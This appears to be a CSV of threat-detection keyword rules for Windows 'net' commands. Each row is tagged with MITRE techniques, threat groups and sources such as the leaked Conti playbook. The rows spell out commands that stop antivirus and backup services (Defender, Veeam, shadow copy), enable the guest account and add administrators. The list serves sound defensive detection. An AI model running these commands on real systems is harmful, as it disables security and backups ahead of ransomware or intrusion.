"*net stop svcGenericHost*",".{0,1000}net\sstop\ssvcGenericHost.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop swi_filter*",".{0,1000}net\sstop\sswi_filter.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop swi_service*",".{0,1000}net\sstop\sswi_service.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop swi_update*",".{0,1000}net\sstop\sswi_update.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop swi_update_64*",".{0,1000}net\sstop\sswi_update_64.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop TmCCSF*",".{0,1000}net\sstop\sTmCCSF.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop tmlisten*",".{0,1000}net\sstop\stmlisten.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop TrueKey*",".{0,1000}net\sstop\sTrueKey.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop TrueKeyScheduler*    ",".{0,1000}net\sstop\sTrueKeyScheduler.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop TrueKeyServiceHel",".{0,1000}net\sstop\sTrueKeyServiceHel","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop vapiendpoint*       ",".{0,1000}net\sstop\svapiendpoint.{0,1000}\s\s\s\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamBackupSvc*",".{0,1000}net\sstop\sVeeamBackupSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamBrokerSvc *",".{0,1000}net\sstop\sVeeamBrokerSvc\s.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamCatalogSvc*",".{0,1000}net\sstop\sVeeamCatalogSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamCloudSvc*",".{0,1000}net\sstop\sVeeamCloudSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamDeploymentService*",".{0,1000}net\sstop\sVeeamDeploymentService.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamDeploySvc*",".{0,1000}net\sstop\sVeeamDeploySvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamDeploySvc*    ",".{0,1000}net\sstop\sVeeamDeploySvc.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamEnterpriseManagerSvc*",".{0,1000}net\sstop\sVeeamEnterpriseManagerSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamHvIntegrationSvc*",".{0,1000}net\sstop\sVeeamHvIntegrationSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamMountSvc*",".{0,1000}net\sstop\sVeeamMountSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamNFSSvc*",".{0,1000}net\sstop\sVeeamNFSSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamRESTSvc*",".{0,1000}net\sstop\sVeeamRESTSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop VeeamTransportSvc*",".{0,1000}net\sstop\sVeeamTransportSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop vsnapvss*",".{0,1000}net\sstop\svsnapvss.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop vssvc*",".{0,1000}net\sstop\svssvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop wbengine*",".{0,1000}net\sstop\swbengine.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop wbengine*",".{0,1000}net\sstop\swbengine.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop WinDefend*",".{0,1000}net\sstop\sWinDefend.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop WinDefend*",".{0,1000}net\sstop\sWinDefend.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop WRSVC*",".{0,1000}net\sstop\sWRSVC.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net user *$* /*",".{0,1000}net\suser\s.{0,1000}\$.{0,1000}\s\/.{0,1000}","greyware_tool_keyword","net","manipulation of an hidden local account with the net command","T1564 - T1078 - T1136.001","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*NET USER GUEST /ACTIVE:YES*",".{0,1000}NET\sUSER\sGUEST\s\/ACTIVE\:YES.{0,1000}","greyware_tool_keyword","net","activate the guest account in Windows","T1078 - T1087.001 - T1136.001","TA0006 - TA0007 - TA0003","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net view /all /domain*",".{0,1000}net\sview\s\/all\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net view /domain*",".{0,1000}net\sview\s\/all\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","1","0","N/A","N/A","10","1","92","20","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z"
"*net view \\* /all*",".{0,1000}net\sview\s\\\\.{0,1000}\s\/all.{0,1000}","greyware_tool_keyword","net","retrieves a list of shared resources on a remote machine","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net* group Administrator* /add /domain*",".{0,1000}net.{0,1000}\sgroup\sAdministrator.{0,1000}\s\/add\s\/domain.{0,1000}","greyware_tool_keyword","net","adding a user to a privileged group. This action can be used by adversaries to maintain unauthorized access or escalate privileges within the targeted environment.","T1098","TA0003","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
